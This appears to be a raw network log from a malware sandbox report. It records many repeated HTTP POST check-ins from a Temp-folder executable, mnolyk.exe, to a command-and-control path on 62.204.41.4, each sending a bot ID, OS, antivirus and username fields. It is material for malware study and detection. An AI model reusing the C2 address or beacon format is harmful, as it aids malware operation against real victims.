                                                                    Date: Wed, 08 Feb 2023 20:32:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    311 | 192.168.2.3 | 50013 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:46.214238882 CET | 511 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:46.280585051 CET | 511 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    312 | 192.168.2.3 | 50014 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:46.467797041 CET | 512 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:46.531321049 CET | 512 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    313 | 192.168.2.3 | 50015 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:46.699251890 CET | 513 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:46.764550924 CET | 513 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    314 | 192.168.2.3 | 50016 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:46.966726065 CET | 514 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:47.030981064 CET | 514 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    315 | 192.168.2.3 | 50017 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:47.204140902 CET | 515 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:47.270333052 CET | 515 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    316 | 192.168.2.3 | 50018 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:47.458753109 CET | 516 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:47.523410082 CET | 516 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    317 | 192.168.2.3 | 50019 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:47.697839022 CET | 517 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:47.762049913 CET | 517 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    318 | 192.168.2.3 | 50020 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:47.936217070 CET | 518 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:48.005727053 CET | 518 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    319 | 192.168.2.3 | 50021 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:48.182809114 CET | 519 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:48.248092890 CET | 519 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    32 | 192.168.2.3 | 49734 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:24.588963032 CET | 233 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:24.653353930 CET | 233 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    320 | 192.168.2.3 | 50022 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:48.431713104 CET | 520 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:48.495898962 CET | 520 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    321 | 192.168.2.3 | 50023 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:48.666868925 CET | 521 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:48.731539965 CET | 521 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    322 | 192.168.2.3 | 50024 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:48.907601118 CET | 522 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:48.970055103 CET | 522 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    323 | 192.168.2.3 | 50025 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:49.239222050 CET | 523 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:49.345937967 CET | 523 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    324 | 192.168.2.3 | 50026 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:50.554115057 CET | 524 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:50.621462107 CET | 524 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    325 | 192.168.2.3 | 50027 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:50.791193008 CET | 525 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:50.854734898 CET | 525 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    326 | 192.168.2.3 | 50028 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:51.047955990 CET | 526 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:51.115572929 CET | 526 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    327 | 192.168.2.3 | 50029 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:51.298222065 CET | 527 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:51.365262985 CET | 527 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    328 | 192.168.2.3 | 50030 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:51.734575033 CET | 528 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:51.800061941 CET | 528 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    329 | 192.168.2.3 | 50031 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:52.026036024 CET | 529 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:52.123317957 CET | 529 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    33 | 192.168.2.3 | 49735 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:24.825436115 CET | 234 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
